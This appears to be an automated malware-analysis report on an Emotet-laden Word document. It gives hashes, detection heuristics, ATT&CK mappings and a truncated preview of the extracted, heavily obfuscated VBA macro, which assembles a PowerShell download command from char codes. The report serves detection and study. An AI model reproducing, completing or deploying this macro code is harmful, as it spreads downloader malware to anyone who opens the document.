Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 455c326f5acf6c73…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 237.5 KB
Created: 2018-06-28 13:49:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 97a9e3c78bb3967520e6b348ee1d9858
SHA-1: c09c7ca86d4002c369a1737bf878bd5655fc3ce1
SHA-256: 455c326f5acf6c73c057e6d8f1ca184cc628ec05557535efbf638ef8556efbf1
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6958980-0'. Static analysis revealed VBA macros, specifically an AutoOpen macro that calls the Shell() function, so the document is designed to execute commands as soon as it is opened. This is a common Emotet tactic: the macro launches a command that downloads and installs further malicious components.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6958980-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6958980-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11809 bytes
SHA-256: ae1a91396e9e06f8fa039365863719c5fe6a585e072b694adce9f274d58e9b56

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "DvXzFrbQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SEzhncotjwZdl"
Function PjzwEX()
On Error Resume Next
UMZwNw _
= 62697 + Atn(713) / 84970 / _
Round(57327) / 71986 / CInt(ZBtmw)
woHzmJ = ChrB(40045 + _
Sin(JQbVXi * CLng(ZojXN + 65191) _
 + 91319 _
+ jLSPXv))
jhQOWc = "HELL  " + "     " + "       " + "     " + "    " + "         "
GCiYY _
= 55667 + Atn(63261) / 41291 / _
Round(49735) / 31280 / CInt(bpPZWG)
LzNJP = ChrB(72555 + _
Sin(CzanU * CLng(wqlKYn + 98071) _
 + 11496 _
+ sSJGjG))
KmToq = "     " + "    " + Chr(34) + " $" + Chr(40) + "sEt-" + "VarIAbL" + "E  'OfS' " + " ''" + Chr(41) + " " + Chr(34) + " " + Chr(43) + " [st" + "RinG]" + Chr(40) + " " + Chr(40) + "46 ,97 " + ",71 "
ZHoLI _
= 24052 + Atn(93027) / 19585 / _
Round(93175) / 75395 / CInt(WVdGhF)
jkDFA = ChrB(68770 + _
Sin(BjGvA * CLng(CvwZS + 98308) _
 + 17157 _
+ kubOlq))
PzpPEOF = ", 10" + "0, 55" + " , 1" + "00, 111 ," + " 125," + "39 , 101" + ", 104,9" + "6 , 111" + " , 105,1" + "26 ," + "42,68, "
kzmkEk _
= 4621 + Atn(43646) / 5904 / _
Round(39302) / 13957 / CInt(EGcpP)
iubZDn = ChrB(66610 + _
Sin(kwpbrP * CLng(iQlTKv + 46378) _
 + 99996 _
+ tFLuE))
tcZkX = "111 ,126 " + ", 36 ,93 " + ", 111,1" + "04, 73 ," + "102 ,9" + "9, 111," + "100,126 " + ",49, 46 "
HEMRGw _
= 1342 + Atn(20487) / 89081 / _
Round(99255) / 4245 / CInt(zFhbd)
LZqqVF = ChrB(2140 + _
Sin(uDjwb * CLng(rGokPZ + 16579) _
 + 94772 _
+ GrUHmY))
LDtoC = ",94 ,70,6" + "6,55 ,45" + ", 98 ," + " 126 ,12" + "6, 122 ,4" + "8 ,37" + " , 37," + " 125 ,"
rRcTii _
= 78310 + Atn(32976) / 67260 / _
Round(14430) / 31913 / CInt(BziwY)
QtRwM = ChrB(7596 + _
Sin(OvjzBz * CLng(iALOW + 14958) _
 + 10589 _
+ RXBHI))
tXwsHJ = " 125," + "125,36,97" + " ,101" + ",120" + ",111,1" + "02 , " + "101, 12"
PjzwEX = jhQOWc + KmToq + PzpPEOF + tcZkX + LDtoC + tXwsHJ
vjcvw _
= 88662 + Atn(42515) / 58880 / _
Round(55151) / 89934 / CInt(YkUiF)
hKCSB = ChrB(72237 + _
Sin(ZQIDc * CLng(uEvaSO + 14710) _
 + 6912 _
+ CsDXR))
End Function
Function CnIjzc()
On Error Resume Next
wXkiM _
= 10445 + Atn(39177) / 94462 / _
Round(12614) / 81351 / CInt(vMVflS)
izAcJ = ChrB(3768 + _
Sin(zObHK * CLng(iUFbs + 45263) _
 + 46901 _
+ oaHok))
XouiaOzG = "6, 101 " + ",103" + " ,10" + "1, 126, 9" + "9 , " + "124 , 36" + ", 100 ,1"
TvhZR _
= 48595 + Atn(2599) / 78440 / _
Round(33060) / 17532 / CInt(NiKOr)
pwbPaG = ChrB(88702 + _
Sin(OuluZs * CLng(YdACjC + 81344) _
 + 70645 _
+ pDwGf))
cazcGqUhTF = "11 ," + "126 ,3" + "7 , " + "109 , " + "123, " + "61,79" + " ,93" + ", 50 , 3" + "7 ,74," + "98 ," + " 126,"
NBzhSs _
= 17133 + Atn(17806) / 86585 / _
Round(77876) / 76373 / CInt(CiPurQ)
oFKMKq = ChrB(98703 + _
Sin(OaXJn * CLng(Zhkwr + 51070) _
 + 92918 _
+ THNsP))
XzPkkZs = "126 " + ",122, 4" + "8 ,37" + ", 37, 12" + "5,125 ," + " 125," + " 36 ,10" + "0, 111 ," + "125,12" + "1,126 " + ", 111, " + "109 , "
GzuLjZ _
= 81027 + Atn(66981) / 5234 / _
Round(78191) / 75126 / CInt(SjuiVi)
fdzizz = ChrB(80574 + _
Sin(YmDwRb * CLng(FQfLd + 27261) _
 + 33832 _
+ iwJAHQ))
iYPjTJw = "36,105, 1" + "01 ," + " 103, 37" + " , 73" + ",123,73 ," + " 107 , " + "37, 7" + "4 , 98 ," + "126 , 12" + "6, 1" + "22, 4" + "8 ,37 , "
kljsk _
= 19006 + Atn(16261) / 36888 / _
Round(94204) / 22482 / CInt(oRwwpV)
GadDJ = ChrB(2888 + _
Sin(NmTioz * CLng(UDBSPY + 82760) _
 + 4096 _
+ ziAmZA))
XZMLHrmwc = "37, 125 ," + " 125, 12" + "5 , 36," + "120 ,101," + "121 " + ", 111" + " ,102," + "124, 9" + "9, 3" + "6 , 105," + "102,37"
fGojBp _
= 84017 + Atn(64579) / 54028 / _
Round(64443) / 13555 / CInt(XpkIM)
UNvja = ChrB(93879 + _
Sin(EdjUJ * CLng(MNsnc + 99836) _
 + 30160 _
+ iLTqiR))
DiHdzPVO = ",100 , " + "57 , " + "123,89 ,9" + "4 ,66 ," + "37 ,74 ,9" + "8, 12" + "6 ,12" + "6 , 12" + "2,48 ," + "37,37,"
iIMZo _
= 58399 + Atn(8923
... (truncated)